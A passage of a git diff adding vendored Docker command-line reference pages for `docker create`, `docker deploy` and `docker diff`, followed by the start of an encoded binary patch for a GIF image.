+ --cpu-percent int CPU percent (Windows only) + --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpus NanoCPUs Number of CPUs (default 0.000) + --cpu-rt-period int Limit the CPU real-time period in microseconds + --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + --device value Add a host device to the container (default []) + --device-read-bps value Limit read rate (bytes per second) from a device (default []) + --device-read-iops value Limit read rate (IO per second) from a device (default []) + --device-write-bps value Limit write rate (bytes per second) to a device (default []) + --device-write-iops value Limit write rate (IO per second) to a device (default []) + --disable-content-trust Skip image verification (default true) + --dns value Set custom DNS servers (default []) + --dns-option value Set DNS options (default []) + --dns-search value Set custom DNS search domains (default []) + --entrypoint string Overwrite the default ENTRYPOINT of the image + -e, --env value Set environment variables (default []) + --env-file value Read in a file of environment variables (default []) + --expose value Expose a port or a range of ports (default []) + --group-add value Add additional groups to join (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) + --help Print usage + -h, --hostname string Container host name + --init Run an init inside the container that forwards signals and reaps processes + --init-path 
string Path to the docker-init binary + -i, --interactive Keep STDIN open even if not attached + --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) + --io-maxiops uint Maximum IOps limit for the system drive (Windows only) + --ip string Container IPv4 address (e.g. 172.30.100.104) + --ip6 string Container IPv6 address (e.g. 2001:db8::33) + --ipc string IPC namespace to use + --isolation string Container isolation technology + --kernel-memory string Kernel memory limit + -l, --label value Set meta data on a container (default []) + --label-file value Read in a line delimited file of labels (default []) + --link value Add link to another container (default []) + --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) + --log-driver string Logging driver for the container + --log-opt value Log driver options (default []) + --mac-address string Container MAC address (e.g. 92:d0:c6:0a:29:33) + -m, --memory string Memory limit + --memory-reservation string Memory soft limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) + --name string Assign a name to the container + --network-alias value Add network-scoped alias for the container (default []) + --network string Connect a container to a network (default "default") + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack + '|': connect to a user-defined network + --no-healthcheck Disable any container-specified HEALTHCHECK + --oom-kill-disable Disable OOM Killer + --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) + --pid string PID namespace to use + --pids-limit int Tune container pids limit (set -1 for unlimited), kernel >= 4.3 + --privileged Give extended privileges to this container + -p, 
--publish value Publish a container's port(s) to the host (default []) + -P, --publish-all Publish all exposed ports to random ports + --read-only Mount the container's root filesystem as read only + --restart string Restart policy to apply when a container exits (default "no") + Possible values are: no, on-failure[:max-retry], always, unless-stopped + --rm Automatically remove the container when it exits + --runtime string Runtime to use for this container + --security-opt value Security Options (default []) + --shm-size string Size of /dev/shm, default value is 64MB. + The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), + or `g` (gigabytes). If you omit the unit, the system uses bytes. + --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") + --stop-timeout=10 Timeout (in seconds) to stop a container + --storage-opt value Storage driver options for the container (default []) + --sysctl value Sysctl options (default map[]) + --tmpfs value Mount a tmpfs directory (default []) + -t, --tty Allocate a pseudo-TTY + --ulimit value Ulimit options (default []) + -u, --user string Username or UID (format: [:]) + --userns string User namespace to use + 'host': Use the Docker host user namespace + '': Use the Docker daemon user namespace specified by `--userns-remap` option. + --uts string UTS namespace to use + -v, --volume value Bind mount a volume (default []). The format + is `[host-src:]container-dest[:]`. + The comma-delimited `options` are [rw|ro], + [z|Z], [[r]shared|[r]slave|[r]private], and + [nocopy]. The 'host-src' is an absolute path + or a name value. 
+ --volume-driver string Optional volume driver for the container + --volumes-from value Mount volumes from the specified container(s) (default []) + -w, --workdir string Working directory inside the container +``` + +The `docker create` command creates a writeable container layer over the +specified image and prepares it for running the specified command. The +container ID is then printed to `STDOUT`. This is similar to `docker run -d` +except the container is never started. You can then use the +`docker start ` command to start the container at any point. + +This is useful when you want to set up a container configuration ahead of time +so that it is ready to start when you need it. The initial status of the +new container is `created`. + +Please see the [run command](run.md) section and the [Docker run reference](../run.md) for more details. + +## Examples + + $ docker create -t -i fedora bash + 6d8af538ec541dd581ebc2a24153a28329acb5268abe5ef868c1f1a261221752 + $ docker start -a -i 6d8af538ec5 + bash-4.2# + +As of v1.4.0 container volumes are initialized during the `docker create` phase +(i.e., `docker run` too). For example, this allows you to `create` the `data` +volume container, and then use it from another container: + + $ docker create -v /data --name data ubuntu + 240633dfbb98128fa77473d3d9018f6123b99c454b3251427ae190a7d951ad57 + $ docker run --rm --volumes-from data ubuntu ls -la /data + total 8 + drwxr-xr-x 2 root root 4096 Dec 5 04:10 . + drwxr-xr-x 48 root root 4096 Dec 5 04:11 .. + +Similarly, `create` a host directory bind mounted volume container, which can +then be used from the subsequent container: + + $ docker create -v /home/docker:/docker --name docker ubuntu + 9aa88c08f319cd1e4515c3c46b0de7cc9aa75e878357b1e96f91e2c773029f03 + $ docker run --rm --volumes-from docker ubuntu ls -la /docker + total 20 + drwxr-sr-x 5 1000 staff 180 Dec 5 04:00 . + drwxr-xr-x 48 root root 4096 Dec 5 04:13 .. 
+ -rw-rw-r-- 1 1000 staff 3833 Dec 5 04:01 .ash_history + -rw-r--r-- 1 1000 staff 446 Nov 28 11:51 .ashrc + -rw-r--r-- 1 1000 staff 25 Dec 5 04:00 .gitconfig + drwxr-sr-x 3 1000 staff 60 Dec 1 03:28 .local + -rw-r--r-- 1 1000 staff 920 Nov 28 11:51 .profile + drwx--S--- 2 1000 staff 460 Dec 5 00:51 .ssh + drwxr-xr-x 32 1000 staff 1140 Dec 5 04:01 docker + +Set storage driver options per container. + + $ docker create -it --storage-opt size=120G fedora /bin/bash + +This (size) will allow to set the container rootfs size to 120G at creation time. +This option is only available for the `devicemapper`, `btrfs`, `overlay2`, +`windowsfilter` and `zfs` graph drivers. +For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, +user cannot pass a size less than the Default BaseFS Size. +For the `overlay2` storage driver, the size option is only available if the +backing fs is `xfs` and mounted with the `pquota` mount option. +Under these conditions, user can pass any size less then the backing fs size. + +### Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + + +| Value | Description | +|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value if the +daemon is running on Windows server, or `hyperv` if running on Windows client. | +| `process` | Namespace isolation only. | +| `hyperv` | Hyper-V hypervisor partition-based isolation. 
| + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md new file mode 100644 index 0000000000..53074b2fd4 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md @@ -0,0 +1,101 @@ +--- +title: "deploy" +description: "The deploy command description and usage" +keywords: "stack, deploy" +advisory: "experimental" +--- + + + +# deploy (alias for stack deploy) (experimental) + +```markdown +Usage: docker deploy [OPTIONS] STACK + +Deploy a new stack or update an existing stack + +Aliases: + deploy, up + +Options: + --bundle-file string Path to a Distributed Application Bundle file + --compose-file string Path to a Compose file + --help Print usage + --with-registry-auth Send registry authentication details to Swarm agents +``` + +Create and update a stack from a `compose` or a `dab` file on the swarm. This command +has to be run targeting a manager node. + +## Compose file + +The `deploy` command supports compose file version `3.0` and above. 
+ +```bash +$ docker stack deploy --compose-file docker-compose.yml vossibility +Ignoring unsupported options: links + +Creating network vossibility_vossibility +Creating network vossibility_default +Creating service vossibility_nsqd +Creating service vossibility_logstash +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_ghollector +Creating service vossibility_lookupd +``` + +You can verify that the services were correctly created + +``` +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## DAB file + +```bash +$ docker stack deploy --bundle-file vossibility-stack.dab vossibility +Loading bundle from vossibility-stack.dab +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_logstash +Creating service vossibility_lookupd +Creating service vossibility_nsqd +Creating service vossibility_vossibility-collector +``` + +You can verify that the services were correctly created: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 
nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## Related information + +* [stack config](stack_config.md) +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md new file mode 100644 index 0000000000..be27678dcd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md @@ -0,0 +1,48 @@ +--- +title: "diff" +description: "The diff command description and usage" +keywords: "list, changed, files, container" +--- + + + +# diff + +```markdown +Usage: docker diff CONTAINER + +Inspect changes on a container's filesystem + +Options: + --help Print usage +``` + +List the changed files and directories in a container᾿s filesystem. + There are 3 events that are listed in the `diff`: + +1. `A` - Add +2. `D` - Delete +3. `C` - Change + +For example: + + $ docker diff 7bb0e258aefe + + C /dev + A /dev/kmsg + C /etc + A /etc/mtab + A /go + A /go/src + A /go/src/github.com + A /go/src/github.com/docker + A /go/src/github.com/docker/docker + A /go/src/github.com/docker/docker/.git + .... 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif b/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif new file mode 100644 index 0000000000000000000000000000000000000000..5894ca270e002758b8f332141e00356e42868880 GIT binary patch literal 35785 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 